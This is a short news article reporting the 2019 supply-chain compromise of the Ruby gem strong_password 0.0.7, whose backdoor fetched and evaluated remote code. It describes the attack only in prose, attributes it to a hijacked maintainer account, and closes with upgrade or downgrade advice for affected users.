Tute Costa, a developer at Epion Health, recently discovered malicious code in a Ruby gem called strong_password. This discovery came after he heavily scrutinized changes that were made to each gem following an update. Costa discovered that no changes were made to strong_password even though the version number had been incremented from 0.0.6 to 0.0.7
After digging a little further, he discovered code that looped a GET request to pastebin.com, a code snippet sharing site, if running in production. The code also handled errors to mask its presence.
What we can surmise from the code that Costa made available is that the get request would fetch the code found on pastebin and immediately execute it using eval. The request would then lay dormant for a random interval before requesting code from pastebin once more. The code found embedded in strong_password allows the hacker to modify their attack without constantly interfering with the modified strong_password gem. As a side note, this non-monolithic approach is good design. Unfortunately, good design is being used for nefarious purposes.
The code gets even more interesting when we look at the pastebin snippet provided by Costa. There, the code evaluates anything in a special cookie that matches an __id suffix. The attacker’s server would then be notified about the infected hosts because of HTTP requests made using the Faraday gem. In the end, the attacker would not only be able to affect the production site itself, but then use that site to infect other users who stumble upon the infected site as well thanks to the middleware injected into cookies.
How did the attacker gain the privileges required to perform this exploit? Well, Rafael France, the creator of strong_password, attributed it to a “simple account hijack.” He went on to say, “The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.”
The irony is pretty thick.
It’s hard to say how many users may have been effected. Download numbers alone aren’t enough to arrive at an estimate since it’s well known that a sizable portion of users do not update gems. Even so, this incident serves as a warning to those that rely on open source tools that are not rigorously maintained. RubyGems is then left with the task of policing bad actors who take advantage of abandoned projects that devs continue to rely on.
If you had updated to the bogus 0.0.7 version, you should update to the new version 0.0.8 release. Or, you can just downgrade.
strong_password v0.0.7 has been yanked, as it contained malicious code.
Make sure to downgrade if you run it in production.https://t.co/Q4q7p7dJ1s
— Tute Costa (@tutec) July 4, 2019